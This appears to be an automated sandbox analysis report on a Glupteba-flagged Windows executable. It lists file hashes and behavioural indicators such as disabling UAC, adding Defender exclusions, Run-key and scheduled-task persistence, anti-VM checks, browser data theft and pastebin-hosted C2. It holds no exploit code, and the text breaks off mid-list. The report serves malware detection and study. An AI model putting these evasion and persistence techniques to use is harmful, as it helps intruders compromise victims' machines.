Analysis
-
max time kernel
18s -
max time network
144s -
platform
windows11-21h2_x64 -
resource
win11-20231222-en -
resource tags
arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system -
submitted
04-02-2024 20:53
Static task
static1
Behavioral task
behavioral1
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Resource
win10v2004-20231215-en
General
-
Target
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
-
Size
735KB
-
MD5
9f5cb3a9a4053a53063a9da9afbf6273
-
SHA1
b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e
-
SHA256
ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1
-
SHA512
aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26
-
SSDEEP
12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA
Malware Config
Signatures
-
Glupteba payload 7 IoCs
resource yara_rule behavioral4/memory/488-100-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/2044-462-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/5028-582-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/5028-674-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/5028-683-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/5028-741-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral4/memory/5028-750-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0" ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5024 netsh.exe 2152 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sl2UsgwsoJTX9BeKjhlsVixq.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hrtJ6E5NrjVZ6HsxjOyCwka1.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BFwR2gFzGDOZHZWDIJAFYo8e.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FOT3NQ7fixRIYZCcoA10hPXg.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0Bgj9xjCLgBZGPnYq5Uq0DdI.bat CasPol.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FRdLJn7lN0XOV9XY7Y8KABUe.bat CasPol.exe -
Executes dropped EXE 14 IoCs
pid Process 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 776 MH4vHdSKdQvLchJ0U7Qk7K5X.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 1040 jLF0fxs2rPLfiAzDNp4zK87P.exe 3940 Install.exe 5008 Install.exe 4276 WerFault.exe 4652 IgCBQGLVZvnO0Gn4aYk2USBy.exe 3000 reg.exe 4532 IgCBQGLVZvnO0Gn4aYk2USBy.exe 3700 IgCBQGLVZvnO0Gn4aYk2USBy.exe 5028 csrss.exe -
Loads dropped DLL 5 IoCs
pid Process 4276 WerFault.exe 4652 IgCBQGLVZvnO0Gn4aYk2USBy.exe 3000 reg.exe 4532 IgCBQGLVZvnO0Gn4aYk2USBy.exe 3700 IgCBQGLVZvnO0Gn4aYk2USBy.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral4/files/0x0002000000025c6d-251.dat upx behavioral4/files/0x0002000000025c6d-257.dat upx behavioral4/memory/3000-278-0x00000000007F0000-0x0000000000CD8000-memory.dmp upx behavioral4/files/0x0002000000025c6d-298.dat upx behavioral4/files/0x0002000000025c6d-283.dat upx behavioral4/files/0x0002000000025c7c-273.dat upx behavioral4/files/0x0002000000025c6d-270.dat upx behavioral4/files/0x0002000000025c6d-263.dat upx behavioral4/files/0x000600000002a752-611.dat upx behavioral4/files/0x000600000002a752-613.dat upx behavioral4/memory/4220-614-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral4/files/0x000600000002a752-610.dat upx behavioral4/memory/904-675-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral4/memory/904-726-0x0000000000400000-0x00000000008DF000-memory.dmp upx -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0" ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" yYUJfEya7aGR6tNtQfr4w8RQ.exe -
Checks for any installed AV software in registry 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Avast Software\Avast Install.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: WerFault.exe File opened (read-only) \??\F: WerFault.exe File opened (read-only) \??\D: IgCBQGLVZvnO0Gn4aYk2USBy.exe File opened (read-only) \??\F: IgCBQGLVZvnO0Gn4aYk2USBy.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 2 pastebin.com -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive Conhost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4216 set thread context of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN xEI0gwQdOGW8IAEvvfbrgSfV.exe File opened (read-only) \??\VBoxMiniRdrDN yYUJfEya7aGR6tNtQfr4w8RQ.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\rss yYUJfEya7aGR6tNtQfr4w8RQ.exe File created C:\Windows\rss\csrss.exe yYUJfEya7aGR6tNtQfr4w8RQ.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4256 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 64 IoCs
pid pid_target Process procid_target 3388 3708 WerFault.exe 53 2196 3708 WerFault.exe 53 4736 488 WerFault.exe 60 4616 488 WerFault.exe 60 3116 488 WerFault.exe 60 904 488 WerFault.exe 60 2076 488 WerFault.exe 60 3556 488 WerFault.exe 60 3196 3708 WerFault.exe 53 2344 3708 WerFault.exe 53 4288 488 WerFault.exe 60 4140 3708 WerFault.exe 53 4360 3708 WerFault.exe 53 3720 3708 WerFault.exe 53 2780 3708 WerFault.exe 53 4736 488 WerFault.exe 60 1832 3708 WerFault.exe 53 908 488 WerFault.exe 60 1624 488 WerFault.exe 60 3812 3708 WerFault.exe 53 4796 488 WerFault.exe 60 4848 488 WerFault.exe 60 4156 488 WerFault.exe 60 4684 488 WerFault.exe 60 2524 488 WerFault.exe 60 892 488 WerFault.exe 60 4532 3708 WerFault.exe 53 4544 3708 WerFault.exe 53 2564 488 WerFault.exe 60 2008 1396 WerFault.exe 122 1136 2044 WerFault.exe 123 1624 1396 WerFault.exe 122 2948 1396 WerFault.exe 122 1744 2044 WerFault.exe 123 3456 1396 WerFault.exe 122 4764 1396 WerFault.exe 122 2564 2044 WerFault.exe 123 2768 2044 WerFault.exe 123 4852 1396 WerFault.exe 122 2328 2044 WerFault.exe 123 1912 1396 WerFault.exe 122 4652 2044 WerFault.exe 123 4288 1396 WerFault.exe 122 132 2044 WerFault.exe 123 4660 2044 WerFault.exe 123 908 1396 WerFault.exe 122 4388 2044 WerFault.exe 123 4840 3708 WerFault.exe 53 4276 3708 WerFault.exe 53 3660 488 WerFault.exe 60 660 3708 WerFault.exe 53 2340 3708 WerFault.exe 53 1832 488 WerFault.exe 60 1468 1396 WerFault.exe 122 1584 3708 WerFault.exe 53 1680 5028 WerFault.exe 243 3888 5028 WerFault.exe 243 4748 5028 WerFault.exe 243 3000 5028 WerFault.exe 243 1068 5028 WerFault.exe 243 2716 2044 WerFault.exe 123 2928 5028 WerFault.exe 243 692 2044 WerFault.exe 123 3864 5028 WerFault.exe 243 -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4308 schtasks.exe 1768 schtasks.exe 3372 schtasks.exe 4272 schtasks.exe 3812 schtasks.exe 2992 schtasks.exe 3560 schtasks.exe 4624 schtasks.exe 3372 schtasks.exe 2524 schtasks.exe 1068 schtasks.exe 3508 schtasks.exe 3044 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs Conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" yYUJfEya7aGR6tNtQfr4w8RQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 50 IoCs
pid Process 4864 powershell.exe 4864 powershell.exe 4064 reg.exe 3980 WerFault.exe 4064 reg.exe 3980 WerFault.exe 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe 3196 powershell.exe 3196 powershell.exe 3532 powershell.exe 3532 powershell.exe 3196 powershell.exe 3532 powershell.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 2044 xEI0gwQdOGW8IAEvvfbrgSfV.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 1396 yYUJfEya7aGR6tNtQfr4w8RQ.exe 3888 Conhost.exe 3888 Conhost.exe 3888 Conhost.exe 1868 powershell.exe 1868 powershell.exe 1868 powershell.exe 3968 reg.exe 3968 reg.exe 3968 reg.exe 4852 powershell.exe 4852 powershell.exe 4852 powershell.exe 1292 Process not Found 1292 Process not Found -
Suspicious use of AdjustPrivilegeToken 15 IoCs
description pid Process Token: SeDebugPrivilege 3412 CasPol.exe Token: SeDebugPrivilege 4864 powershell.exe Token: SeDebugPrivilege 4064 reg.exe Token: SeDebugPrivilege 3980 WerFault.exe Token: SeDebugPrivilege 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe Token: SeImpersonatePrivilege 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe Token: SeDebugPrivilege 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe Token: SeImpersonatePrivilege 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 3532 powershell.exe Token: SeDebugPrivilege 3888 Conhost.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 3968 reg.exe Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 1292 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4216 wrote to memory of 4864 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 30 PID 4216 wrote to memory of 4864 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 30 PID 4216 wrote to memory of 4864 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 30 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 4216 wrote to memory of 3412 4216 ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe 27 PID 3412 wrote to memory of 3708 3412 CasPol.exe 53 PID 3412 wrote to memory of 3708 3412 CasPol.exe 53 PID 3412 wrote to memory of 3708 3412 CasPol.exe 53 PID 3412 wrote to memory of 488 3412 CasPol.exe 60 PID 3412 wrote to memory of 488 3412 CasPol.exe 60 PID 3412 wrote to memory of 488 3412 CasPol.exe 60 PID 488 wrote to memory of 4064 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 428 PID 488 wrote to memory of 4064 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 428 PID 488 wrote to memory of 4064 488 xEI0gwQdOGW8IAEvvfbrgSfV.exe 428 PID 3708 wrote to memory of 3980 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe 282 PID 3708 wrote to memory of 3980 3708 yYUJfEya7aGR6tNtQfr4w8RQ.exe 282 PID 3708 wrote to memory of 3980 3708 